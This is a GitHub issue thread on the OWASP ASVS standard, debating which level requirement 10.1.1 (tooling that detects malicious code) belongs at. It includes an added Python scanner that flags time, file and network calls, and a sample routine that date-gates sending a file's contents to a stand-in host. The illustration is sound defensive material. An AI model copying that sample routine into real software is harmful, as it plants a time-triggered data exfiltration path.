OWASP / ASVS

Application Security Verification Standard
Creative Commons Attribution Share Alike 4.0 International

10.1.1 asks for basic SAST but is L3; should this be L1? #1200

Closed jmanico closed 1 year ago

jmanico commented 2 years ago
10.1.1 Verify that a code analysis tool is in use that can detect potentially malicious code, such as time functions, unsafe file operations and network connections.
elarlang commented 2 years ago

For me L3 seems more correct.

mascotter commented 2 years ago

Taking into account the development world moving more and more into DevOps and highlighting automation (also security-wise), I find it incomprehensible that a SAST tool is a requirement only for L3, i.e. "the most critical applications" as per the definition in the ASVS.

If the penetration-testable approach needs to be maintained for L1, how about making requirement 10.1.1 mandatory beginning from L2?

jmanico commented 2 years ago

Absolutely I agree this should be a level 1 or 2 requirement. Lack of a static analysis tool during development is close to security negligence these days. +1

vdbaan commented 2 years ago

I would make this an L2 requirement. L1 claims to be completely penetration testable, and I would say that this requirement asks for attestation instead.

jmanico commented 2 years ago

We are dropping the "testing" designation for each ASVS level and are just moving it to risk levels. We may mimic MASVS where Level 1 is the low baseline for secure apps and level 2 is for advanced apps and drop the three levels.

So if the current three levels were risk levels, would that change your opinion?

Loosely today, level 1 is for public apps and provides low security, level 2 is for sensitive apps and level 3 is for critical infrastructure....

vdbaan commented 2 years ago

I like to hear that the ASVS is moving to risk levels.

If that is the case I would recommend it for Level 1. Even a SAST that is not tuned optimally will provide insight. Perhaps add that the findings of SAST should be blocking from Level 2 onwards.

jmanico commented 2 years ago

I agree that using SAST should be a requirement at the most basic levels of ASVS. +1

vdbaan commented 2 years ago

I would like to clarify that the purpose of SAST for Level 1 is awareness, especially if the tool is not tuned for the application. For higher levels the tool needs to be tuned to reduce FPs, as those findings are more of a hindrance than a help in raising awareness.

Sjord commented 2 years ago

I agree that everyone should run SAST to detect security bugs. But is that what this requirement says?

that can detect potentially malicious code

Not security bugs, but actively malicious code.
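An added illustration (not part of this thread or of ASVS) of the kind of check 10.1.1 describes, as distinct from a bug-finding SAST rule: a small Python AST scanner that flags calls in the three indicator categories the requirement names. The module and function names it matches, and the sample source it scans, are constructed here as assumptions.

```python
import ast
from typing import List, Tuple

# Indicator categories named in ASVS 10.1.1; the specific module/function
# names below are this example's assumption, not a list from the standard.
INDICATORS = {
    "time function": {"time.time", "time.sleep", "datetime.datetime.now", "datetime.date.today"},
    "unsafe file operation": {"os.remove", "os.unlink", "shutil.rmtree", "os.chmod", "open"},
    "network connection": {"socket.socket", "socket.create_connection",
                           "urllib.request.urlopen", "requests.get", "requests.post"},
}

def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, or '' if the callee is not a plain name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def scan_source(source: str) -> List[Tuple[int, str, str]]:
    """Return (line, category, callee) for every call matching an indicator, sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            callee = _dotted_name(node.func)
            for category, names in INDICATORS.items():
                if callee in names:
                    findings.append((node.lineno, category, callee))
    return sorted(findings)

# Constructed sample: a date-gated routine that reads a file and opens a socket is the
# pattern 10.1.1 wants surfaced for human review; the hits alone prove nothing malicious.
SAMPLE = """\
import socket, datetime

def sync(path):
    data = open(path).read()
    if datetime.date.today().day == 1:
        s = socket.create_connection(("example.invalid", 443))
        s.sendall(data.encode())
"""

if __name__ == "__main__":
    for line, category, callee in scan_source(SAMPLE):
        print(f"line {line}: {category} via {callee}()")
```

The scanner only surfaces candidates; deciding whether a flagged time check or connection is legitimate is the reviewer's job, which is why the thread treats 10.1.1 as a different kind of requirement from ordinary SAST.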

vdbaan commented 1 year ago

This item has been removed as per #1507; the issue can be closed.